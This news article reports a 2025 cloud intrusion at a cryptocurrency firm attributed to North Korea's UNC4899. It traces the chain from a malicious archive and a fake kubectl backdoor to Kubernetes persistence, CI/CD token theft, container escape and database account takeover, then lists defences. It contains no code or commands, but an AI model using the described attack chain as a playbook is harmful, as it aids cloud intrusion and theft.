North Korean Cyber Group Suspected in Major Cloud Attack on Crypto Firm
A sophisticated cyberattack targeting a cryptocurrency organization in 2025 has been linked to a North Korean hacking group known as UNC4899, according to new threat intelligence findings.
Security analysts believe the attackers stole millions of dollars in cryptocurrency after infiltrating the company’s cloud infrastructure. The group has previously been tracked by multiple security vendors under different names, including Jade Sleet, PUKCHONG, Slow Pisces, and TraderTraitor.
Researchers say the operation combined several advanced techniques, including social engineering, device-to-device file transfers, and abuse of legitimate cloud services to hide malicious activity.
Attack Began With Developer Social Engineering
According to findings highlighted in Google Cloud’s 2026 Cloud Threat Horizons report, the attack began when a developer was tricked into downloading a malicious archive file.
The attackers presented the file as part of a collaboration on an open-source project. After downloading it to a personal computer, the developer later transferred the archive to their corporate workstation using AirDrop, unknowingly bringing the malware into the company environment.
While exploring the files using an AI-powered development environment, the victim executed hidden Python code embedded inside the archive. This code launched a malicious binary disguised as the Kubernetes command-line tool, allowing the attackers to establish a backdoor connection to the machine.
Hackers Pivoted From Workstation to Cloud Infrastructure
Once the attackers gained access to the developer’s corporate system, they used the compromised machine to move deeper into the organization’s cloud environment.
The malware connected to an attacker-controlled server and enabled remote access to the infected workstation. Using stolen credentials and active authentication sessions, the attackers began exploring the company’s Google Cloud resources.
Their initial actions involved reconnaissance, gathering information about various services, cloud projects, and infrastructure components.
Eventually, the attackers located a bastion host, a system used to manage secure connections to internal infrastructure. By altering its multi-factor authentication settings, they were able to access it and continue probing the network, including examining Kubernetes pods within the environment.
Attackers Used “Living-Off-the-Cloud” Techniques
Instead of deploying obvious malware across the cloud environment, the hackers relied on a tactic known as living-off-the-cloud (LotC). This approach involves abusing legitimate cloud tools and workflows to avoid detection.
The attackers modified Kubernetes deployment configurations so that every newly created pod automatically executed a malicious bash command. This command downloaded a backdoor, ensuring the attackers could maintain long-term access.
Further investigation revealed additional actions taken during the intrusion:
- Kubernetes resources linked to the company’s CI/CD platform were altered to expose service account tokens in system logs.
- The attackers captured a high-privilege CI/CD token, allowing them to expand their access and move laterally across the infrastructure.
- Using the stolen token, they accessed a privileged infrastructure pod and escaped the container environment, giving them deeper control over the system.
- A backdoor was deployed to maintain persistent access to the compromised cloud environment.
Database Credentials Stolen From Misconfigured Workload
After securing deeper access, the attackers focused on systems responsible for managing customer data.
They identified a workload that handled user accounts, security settings, and cryptocurrency wallet information. Within this environment, they discovered static database credentials that had been stored insecurely in environment variables.
Using these credentials, the attackers connected to the company’s production database through the Cloud SQL Auth Proxy. They then executed SQL commands to manipulate user accounts.
The modifications included resetting passwords and updating multi-factor authentication settings for several high-value accounts.
Millions in Cryptocurrency Stolen
With control over these accounts, the attackers were able to access cryptocurrency wallets and initiate withdrawals.
The breach ultimately resulted in the theft of millions of dollars worth of digital assets, highlighting the growing risks facing cryptocurrency organizations operating in cloud environments.
Key Security Lessons From the Attack
Security experts say the incident exposes several critical weaknesses that organizations must address.
These include:
- Risks created by peer-to-peer file transfers between personal and corporate devices
- Use of privileged container environments that allow attackers to escape container isolation
- Poor handling of sensitive secrets such as database credentials within cloud workloads
Experts recommend organizations adopt a defense-in-depth approach to reduce the impact of similar attacks.
Recommended security measures include:
- Enforcing phishing-resistant multi-factor authentication
- Implementing context-aware access controls
- Restricting peer-to-peer file transfers such as AirDrop and Bluetooth on corporate devices
- Ensuring only trusted container images are deployed
- Monitoring for unusual container activity
- Isolating compromised nodes from external connections
- Implementing secure secrets management practices
Security teams are also encouraged to strengthen endpoint protection and prevent unmanaged external devices from interacting with corporate systems.